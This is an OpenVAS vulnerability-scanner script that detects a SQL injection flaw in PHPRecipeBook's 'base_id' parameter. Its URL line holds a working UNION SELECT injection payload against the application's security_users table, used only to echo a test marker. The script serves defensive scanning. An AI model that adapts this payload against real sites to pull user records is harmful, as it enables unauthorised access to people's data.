###############################################################################
# OpenVAS Vulnerability Test
# $Id: PHPRecipeBook_sql_injection.nasl 120 2009-03-12 13:36:43Z mime $
#
# PHPRecipeBook 'base_id' Parameter SQL Injection Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Michael Meyer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100042);
 script_bugtraq_id(34052);
 script_version ("1.0");

 script_name(english:"PHPRecipeBook 'base_id' Parameter SQL Injection Vulnerability");
 desc["english"] = "

 Overview:
  PHPRecipeBook is prone to an SQL-injection vulnerability because it
  fails to sufficiently sanitize user-supplied data before using it in
  an SQL query.

  Exploiting this issue could allow an attacker to compromise the
  application, access or modify data, or exploit latent
  vulnerabilities in the underlying database.

  PHPRecipeBook 2.24 is vulnerable; other versions may also be affected. 

 See also:
  http://www.securityfocus.com/bid/34052

 Risk factor : Medium";

 script_description(english:desc["english"]);
 script_summary(english:"Determine if PHPRecipeBook is vulnerable to SQL Injection.");
 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
 script_dependencie("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);

dir = make_list("/phprecipebook","/recipebook","recipe", cgi_dirs());
foreach d (dir)
{ 
 url = string(d, "/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,+0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4,5,6,7+from+security_users--");
 req = http_get(item:url, port:port);
 buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
 if( buf == NULL )continue;

 if( 
     egrep(pattern: "OpenVAS-SQL-Injection-Test", string: buf)
   )
   {    
    security_warning(port:port);
    exit(0);
   }
}
exit(0);
